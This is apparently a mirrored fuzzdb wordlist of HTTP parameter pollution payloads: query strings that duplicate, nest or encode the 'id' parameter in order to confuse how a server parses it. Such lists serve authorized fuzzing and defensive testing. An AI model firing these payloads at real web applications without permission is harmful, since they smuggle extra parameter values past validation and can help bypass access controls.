mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
38 lines
No EOL
547 B
Text
38 lines
No EOL
547 B
Text
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
|
|
?id=id=1
|
|
&id=1?id=2
|
|
?id['&id=1']=2
|
|
?id[1&id=2]=1
|
|
?id=1&id=2
|
|
&id=1&id=2
|
|
?id=1%26id%3D2
|
|
?id&id=1
|
|
????id=1
|
|
&&&&id=1
|
|
?id=id['1']=2
|
|
?id=1#id=2
|
|
?id==1
|
|
?id===1
|
|
;id=1?id=2
|
|
?id;id=1
|
|
&id=1;id=2
|
|
#id=1?id=2&id=3
|
|
?id=1,2
|
|
?id1,id2=1
|
|
?id[=1&id=2]=3
|
|
?id[&id=2]=1
|
|
?id=[1,2]
|
|
?id&=1
|
|
?id[]=1&id=2
|
|
?id=/:@&=+$&id=2
|
|
?id[=/:@&=+$&id=2]=1
|
|
?id={id:{id:1},2}
|
|
?id[{id:{id[]:1},2}]=3
|
|
?id=%23?id=1
|
|
?id=1%26id=2
|
|
?id=1%2526id=2
|
|
?id=1%c0%a6id=2
|
|
?id=1\uc0a6id=2
|
|
?id=1&id=2
|
|
?id=1&id=2
|
|
?id=1%u0026;id=2 |